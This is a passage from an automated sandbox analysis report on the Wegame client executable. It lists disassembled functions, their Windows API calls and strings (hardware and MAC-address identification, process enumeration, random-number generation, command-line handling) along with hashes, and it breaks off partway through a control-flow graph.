                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$memset$DeleteFindV123@$?filename@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@CloseFirstH_prolog3H_prolog3_ModuleMoveName_invalid_parameter_noinfo_noreturnwcsncat_swcsncpy_s
                                                                • String ID: %s\log\browser_%s.log
                                                                • API String ID: 1354867775-396427173
                                                                • Opcode ID: 0a79215ccf37d03d21c673cfb7e19c414d47187e4e7dfd6eef421c6a41388fb6
                                                                • Instruction ID: e219cd0dfdbe46c6697e9542d329f1db0db03a3874b284be62dbfa10aa16883a
                                                                • Opcode Fuzzy Hash: 0a79215ccf37d03d21c673cfb7e19c414d47187e4e7dfd6eef421c6a41388fb6
                                                                • Instruction Fuzzy Hash: D15123B1C0011C9ACB10EB61CD99BDE77BDEF54318F4041EAE109A3191EB396B99CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD84503 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 166fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD8450D
                                                                • memset.VCRUNTIME140(?,00000000,00000100,000003B0,6BD84096,?,00000010,?), ref: 6BD84553
                                                                • __snprintf_s.LIBCMT ref: 6BD8456C
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 6BD84589
                                                                • memset.VCRUNTIME140(?,00000000,00000018), ref: 6BD845AC
                                                                • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 6BD845CD
                                                                • memset.VCRUNTIME140(?,00000000,00000021), ref: 6BD84601
                                                                • memset.VCRUNTIME140(?,00000000,00000210,?,00000000,00000021), ref: 6BD84614
                                                                • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?), ref: 6BD84680
                                                                  • Part of subcall function 6BD83FB0: __EH_prolog3.LIBCMT ref: 6BD83FB7
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 6BD8475D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$ControlDevice$ChangeCloseCreateFileFindH_prolog3H_prolog3_Notification__snprintf_s_invalid_parameter_noinfo_noreturn
                                                                • String ID: .$\\.\PhysicalDrive%d
                                                                • API String ID: 1363808082-636426351
                                                                • Opcode ID: 1db5c1b4609102fcc8482e70b06032008c2f0def7a51f90060ef27676206c3af
                                                                • Instruction ID: 632f481fd65a40f4318d87322fd8ef4a70b6b7cadc6578dee30eca5761565766
                                                                • Opcode Fuzzy Hash: 1db5c1b4609102fcc8482e70b06032008c2f0def7a51f90060ef27676206c3af
                                                                • Instruction Fuzzy Hash: A75181B1E4032CAFEB22CB60CC85FD9B77CAB16314F0005D9A658AB1D1D7745B848F61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045DC75 Relevance: 19.7, APIs: 13, Instructions: 171processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045DC7F
                                                                  • Part of subcall function 00461579: __EH_prolog3_GS.LIBCMT ref: 00461583
                                                                  • Part of subcall function 00461579: memset.VCRUNTIME140(?,00000000,00000208,00000214,0046A105,?,85A35C35,?,?,?,?,?,0047B8A9,000000FF), ref: 004615A6
                                                                  • Part of subcall function 00461579: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004615BB
                                                                  • Part of subcall function 00461579: PathRemoveFileSpecW.SHLWAPI(?), ref: 004615C8
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0045DCF9
                                                                • Process32First.KERNEL32(00000000,?), ref: 0045DD1B
                                                                • memset.VCRUNTIME140(?,00000000,00000410), ref: 0045DD2F
                                                                • OpenProcess.KERNEL32(00000411,00000000,?), ref: 0045DD52
                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0045DD71
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045DDA8
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?), ref: 0045DE0B
                                                                • _wsplitpath_s.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,00000000,00000000,00000000,?,00000104,00000000,00000000,?,00000000,00000208,?,?,?,?), ref: 0045DE39
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045DE74
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0045DEE5
                                                                  • Part of subcall function 00462373: __EH_prolog3.LIBCMT ref: 0046237A
                                                                • Process32Next.KERNEL32(00000000,?), ref: 0045DF17
                                                                • CloseHandle.KERNEL32(00000000), ref: 0045DF25
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Filememset$CloseH_prolog3_ModuleNameProcess32SimpleString::operator=$ChangeCreateFindFirstH_prolog3HandleNextNotificationOpenPathProcessRemoveSnapshotSpecToolhelp32_wsplitpath_s
                                                                • String ID:
                                                                • API String ID: 1378268911-0
                                                                • Opcode ID: 7b92fbe5341bf65b4073f4c45463a53000b1b6774e7f6601c11e865c5fe56bf2
                                                                • Instruction ID: a50a9d05d8a7cb9146ee99b794bf15e6faab3b71f543bfa5a539bf8585c32850
                                                                • Opcode Fuzzy Hash: 7b92fbe5341bf65b4073f4c45463a53000b1b6774e7f6601c11e865c5fe56bf2
                                                                • Instruction Fuzzy Hash: CE711570D002289EDB60DF65CC85BDDB3B9EF98304F4001EAE50DA7181EB3A6A94CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD84E56 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 115libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000104,6C09F000,?,?,?,6BD84E35,?,?,?,6BD85FF9,?,?,00000000,00000006), ref: 6BD84E82
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 6BD84E92
                                                                • PathAppendA.SHLWAPI(?,iphlpapi.dll), ref: 6BD84EA4
                                                                • LoadLibraryA.KERNEL32(?), ref: 6BD84EB1
                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6BD84ED0
                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6BD84EF6
                                                                • memset.VCRUNTIME140(?,00000000,00000006,?), ref: 6BD84F23
                                                                • FreeLibrary.KERNEL32(00000000), ref: 6BD84FA7
                                                                • memset.VCRUNTIME140(?,00000000,00000006), ref: 6BD84FB8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$Library$AdaptersAddressAppendDirectoryFreeInfoLoadPathProcSystem
                                                                • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                • API String ID: 3992280880-3114217049
                                                                • Opcode ID: d01add25d65550c1083369f168344c2ae2f4059360b97662f6da6c8307933cf9
                                                                • Instruction ID: fe4911ef632cb073b10e7a05b2c968b3c8366a87a21ecd65578cbbb75a2eefd6
                                                                • Opcode Fuzzy Hash: d01add25d65550c1083369f168344c2ae2f4059360b97662f6da6c8307933cf9
                                                                • Instruction Fuzzy Hash: 2A41D476906359ABCB20CB748C58BDABBBCAF15324F0004DDE59DA7241DB34EA85CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD840E5 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 135fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD840EF
                                                                • memset.VCRUNTIME140(?,00000000,00000100,00000394,6BD840AC,?,00000010,?), ref: 6BD84135
                                                                • __snprintf_s.LIBCMT ref: 6BD8414E
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD8416B
                                                                • memset.VCRUNTIME140(?,00000000,0000022D,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD84192
                                                                • memmove.VCRUNTIME140(?,SCSIDISK), ref: 6BD841CD
                                                                • DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 6BD84200
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 6BD842DA
                                                                  • Part of subcall function 6BD83FB0: __EH_prolog3.LIBCMT ref: 6BD83FB7
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$ChangeCloseControlCreateDeviceFileFindH_prolog3H_prolog3_Notification__snprintf_s_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID: SCSIDISK$\\.\Scsi%d:
                                                                • API String ID: 2312515712-2176293039
                                                                • Opcode ID: 409428cee620abf56cd98392bfaf51446b2cdb4849b336da494e9de4aadf2806
                                                                • Instruction ID: a72a03319149a4fd27fe42a0d7a722f3beeec2ea818a272937bc42ca4ec48470
                                                                • Opcode Fuzzy Hash: 409428cee620abf56cd98392bfaf51446b2cdb4849b336da494e9de4aadf2806
                                                                • Instruction Fuzzy Hash: DF518EB1940228ABEB22DB60CC4AFDDB77CAB15724F4001D5E518AB1D1EBB85B85CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD874A3 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD874AD
                                                                • __Init_thread_footer.LIBCMT ref: 6BD87844
                                                                  • Part of subcall function 6BD5F669: __EH_prolog3_catch.LIBCMT ref: 6BD5F670
                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6BD8754A
                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6BD87575
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,00000288,?,0000015C,6BD27394,?,?,?,?,?,00000004), ref: 6BD87592
                                                                  • Part of subcall function 6BD5E4D4: __EH_prolog3_catch.LIBCMT ref: 6BD5E4DB
                                                                  • Part of subcall function 6BD1443B: memmove.VCRUNTIME140(00000003,00000000,00000000,00000003,00000000,?,6BD1461F,00000000,00000003,00000003,?,00000000,00000000,?,?), ref: 6BD1444E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AdaptersH_prolog3_catchInfo$?get_log_instance@base@@H_prolog3_catch_Init_thread_footerLogger@1@memmove
                                                                • String ID: %02x$GetAdaptersInfo result is NULL!$e:\dailybuild_dev\wegame_client\codes\common\src\machine_id.cpp$ecf4bb2d2496
                                                                • API String ID: 1435465011-922771384
                                                                • Opcode ID: 6edef11d1896210ab02430225f37c599e7265416278907b4691ed103d52b2d9b
                                                                • Instruction ID: 05febcda9bcb5dcea238018603a8b60bb3573f12a38d1413f114482825e597e9
                                                                • Opcode Fuzzy Hash: 6edef11d1896210ab02430225f37c599e7265416278907b4691ed103d52b2d9b
                                                                • Instruction Fuzzy Hash: 9B919A71905258EFCB21CF68C891BDDBBB5AF46328F5001E9D109AB290CB385F85DFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD260AA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD260B1
                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6BD27474,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD260C6
                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000040,00000034,6BD27474,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD260D8
                                                                Strings
                                                                • __thiscall boost::uuids::detail::random_provider_base::random_provider_base(void), xrefs: 6BD26109
                                                                • e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\uuid\detail\random_provider_wincrypt.ipp, xrefs: 6BD26104
                                                                • CryptAcquireContext, xrefs: 6BD260DE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AcquireContextCryptErrorH_prolog3_Last
                                                                • String ID: CryptAcquireContext$__thiscall boost::uuids::detail::random_provider_base::random_provider_base(void)$e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\uuid\detail\random_provider_wincrypt.ipp
                                                                • API String ID: 2840587545-1175689356
                                                                • Opcode ID: 3b428808856cc6a55d569d19eec83902fd7f32c4f4a28c323cb7d859af135066
                                                                • Instruction ID: e06e275460307547e71168193ad21a6a540b5ee60c10a9ab597de74d8de6be37
                                                                • Opcode Fuzzy Hash: 3b428808856cc6a55d569d19eec83902fd7f32c4f4a28c323cb7d859af135066
                                                                • Instruction Fuzzy Hash: 1EF0F672911184A6EB21A7708C09F9E7A7C9F96718F500148B300AB154DB7D9A05D770
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BF75150 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,6BF7318D,?,00000000,?,00000000,00000000,?,00000000), ref: 6BF75163
                                                                • CryptGenRandom.ADVAPI32(00000000,?,00000000,?,6BF7318D,?,00000000,?,00000000,00000000,?,00000000), ref: 6BF7517A
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,6BF7318D,?,00000000,?,00000000,00000000,?,00000000), ref: 6BF75185
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: cdde9b72338dc3089770fe8c4b1b59459cd9a261b546cdc2d2865422c6b73fa8
                                                                • Instruction ID: 00f9931ecd8002887fa2a196796f36e003582a094580ceb35fc38b13b3c9e998
                                                                • Opcode Fuzzy Hash: cdde9b72338dc3089770fe8c4b1b59459cd9a261b546cdc2d2865422c6b73fa8
                                                                • Instruction Fuzzy Hash: CAE0123569410CBBEF106F94DD06F987B39EB05741F204195FE04951B0D7B29A219B94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401125 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 0040112F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: 12a1d864e7be8d677a1ff96fbe2d2fb40a12754e78c31473d3c613d729817b10
                                                                • Instruction ID: 963e66266f138d0cdaa1746b82e13d3d10b7b7171814ac18ee39b1200dc106ce
                                                                • Opcode Fuzzy Hash: 12a1d864e7be8d677a1ff96fbe2d2fb40a12754e78c31473d3c613d729817b10
                                                                • Instruction Fuzzy Hash: B7C04CB5D0430C9BCB00EFA5DE4989A7FFCBA0C204B4005B1E956E3350E671F9448BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046042B Relevance: 127.0, APIs: 41, Strings: 31, Instructions: 979COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 374 46042b-46048b call 46e476 GetCommandLineW call 40bcb0 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 379 4604dc-4604f6 GetCommandLineW CommandLineToArgvW 374->379 380 46048d-46049a 374->380 381 460508-460510 379->381 382 4604f8-460503 call 46dcce 379->382 380->379 390 46049c-4604d7 call 43df1b call 453673 call 43e231 380->390 385 460516-46052a wcscmp 381->385 386 46117e-46117f LocalFree 381->386 389 461185-4611a7 call 420c80 call 40bbd0 call 46e420 382->389 387 460786-46078f ?get_log_instance@base@@YAPAVILogger@1@XZ 385->387 388 460530-46053e wcscmp 385->388 386->389 396 4607e0-46083e call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 387->396 397 460791-46079e 387->397 392 460544-460552 wcscmp 388->392 393 4606ae-4606b7 ?get_log_instance@base@@YAPAVILogger@1@XZ 388->393 390->379 401 460554-460562 wcscmp 392->401 402 460579-460586 ?get_log_instance@base@@YAPAVILogger@1@XZ 392->402 399 46070b 393->399 400 4606b9-4606c6 393->400 431 460844-460848 396->431 432 4608f3-460963 call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 396->432 397->396 420 4607a0-4607db call 43df1b call 43f4bb call 43e231 397->420 412 46070d-460781 call 420e50 ?open_web@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 call 45aaae ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z call 45c4dc 399->412 400->399 424 4606c8-460709 call 43df1b call 43f4bb call 43e231 400->424 401->402 406 460564 call 4611a8 401->406 409 4605dc-4605fb wcscmp 402->409 410 460588-460595 402->410 425 460569-460572 406->425 414 460616 409->414 415 4605fd-460614 _wtoi 409->415 410->409 438 460597-4605d7 call 43df1b call 43f4bb call 43e231 410->438 412->386 423 46061d-460622 414->423 415->423 420->396 433 460624-46063a _wtoi 423->433 434 46063c 423->434 424->412 425->385 436 460574 425->436 431->432 443 46084e-460892 call 420e50 call 456131 ?get_log_instance@base@@YAPAVILogger@1@XZ 431->443 472 460a27-460a97 call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 432->472 473 460969-460970 432->473 444 460643-460648 433->444 434->444 436->386 438->409 443->432 479 460894-4608a1 443->479 452 460662 444->452 453 46064a-460660 _wtoi 444->453 460 460669-46066e 452->460 453->460 467 460670-46067a _wtoi 460->467 468 46067c 460->468 476 46067f-4606a9 call 4647dd 467->476 468->476 490 460a9d-460aa4 472->490 491 460b5b-460bcb call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 472->491 473->472 478 460976-4609bd call 420e50 call 456131 ?get_log_instance@base@@YAPAVILogger@1@XZ 473->478 476->386 478->472 496 4609bf-4609cc 478->496 479->432 489 4608a3-4608ee call 43df1b call 43f4bb call 43e231 479->489 489->432 490->491 495 460aaa-460af1 call 420e50 call 456131 ?get_log_instance@base@@YAPAVILogger@1@XZ 490->495 509 460bd1-460bd8 491->509 510 460c8f-460cff call 420e50 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z call 420c80 491->510 495->491 515 460af3-460b00 495->515 496->472 506 4609ce-460a22 call 43df1b call 43f4bb call 43e231 496->506 506->472 509->510 514 460bde-460c25 call 420e50 call 456131 ?get_log_instance@base@@YAPAVILogger@1@XZ 509->514 528 460d05-460d0c 510->528 529 